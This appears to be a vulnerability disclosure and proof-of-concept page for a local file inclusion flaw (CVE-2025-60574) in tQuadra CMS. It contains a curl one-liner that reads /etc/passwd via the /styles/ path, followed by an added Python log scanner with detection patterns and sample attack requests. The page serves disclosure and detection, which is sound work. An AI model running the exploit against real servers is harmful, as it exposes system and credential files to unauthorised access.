CVE-2025-60574 PoC: tQuadra CMS Security Vulnerability

Associated Vulnerability
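Title: tQuadra CMS Security Vulnerability (CVE-2025-60574)
Description: tQuadra CMS is a content management system from the Italian company tQuadra CMS. tQuadra CMS version 4.2.1117 contains a security vulnerability that stems from the /styles path failing to properly sanitize user input, which may lead to local file inclusion attacks.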
Readme
# Vulnerability Discoverers & Exploit Authors

Stefano Andreatta & Jacopo Candido Augelli

---

# CVE-2025-60574

## Vulnerability Description

A Local File Inclusion (LFI) vulnerability has been identified in tQuadra CMS 4.2.1117. The issue exists in the "/styles/" path, which fails to properly sanitize user-supplied input. An attacker can exploit this by sending a crafted GET request to retrieve arbitrary files from the underlying system.

Discoverers: Stefano Andreatta & Jacopo Candido Augelli

## CVSS 3.1 - 7.5 High

```
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
```

## Proof of Concept

```bash
curl -s https://vulnerable.site.com/styles//etc/passwd --output - | gunzip
```
![PoC.png](PoC.png)
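
As an added detection example (not part of the original README or the tQuadra code base), the script below scans web access logs for requests shaped like the PoC above: a `/styles/` request whose remainder, after percent-decoding, is an absolute path. It goes slightly beyond the PoC by also flagging parent-directory segments; the combined log format, the function names and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote

# Assumption: access logs are in common/combined log format.
REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) .*?"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})')
PREFIX = "/styles/"

def decode_fully(value, rounds=3):
    """Percent-decode repeatedly so double-encoded input is normalised."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def suspicious_styles_request(target):
    """Return a reason string for a suspect /styles/ request target, else None."""
    path = decode_fully(target.split("?", 1)[0]).replace("\\", "/")
    if not path.lower().startswith(PREFIX):
        return None
    remainder = path[len(PREFIX):]
    if remainder.startswith("/"):
        return "absolute path after /styles/"
    if ".." in remainder.split("/"):
        return "parent-directory segment after /styles/"
    return None

def scan(lines):
    """Return (ip, target, status, reason) for every flagged log line."""
    findings = []
    for line in lines:
        m = REQUEST_RE.match(line)
        reason = suspicious_styles_request(m["target"]) if m else None
        if reason:
            findings.append((m["ip"], m["target"], int(m["status"]), reason))
    return findings

# Constructed sample log lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = [
    '198.51.100.4 - - [12/Oct/2025:10:01:20 +0000] "GET /styles/main.css?v=3 HTTP/1.1" 200 5120',
    '203.0.113.7 - - [12/Oct/2025:10:01:22 +0000] "GET /styles//etc/passwd HTTP/1.1" 200 1043',
    '203.0.113.7 - - [12/Oct/2025:10:01:25 +0000] "GET /styles/%2Fetc%2Fpasswd HTTP/1.1" 404 0',
    '198.51.100.4 - - [12/Oct/2025:10:01:30 +0000] "GET /index.html HTTP/1.1" 200 800',
]

if __name__ == "__main__":
    for ip, target, status, reason in scan(SAMPLE_LOG):
        print(f"{ip} {status} {target} -> {reason}")
```

Flagged requests that returned status 200 are the ones to triage first, since the CVSS vector above rates the confidentiality impact as high.
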
File Snapshot

```
[4.0K] /data/pocs/1f10fc2c37326a753b623b70f807091fbf69d24e
├── [218K] PoC.png
└── [ 709] README.md

1 directory, 2 files
```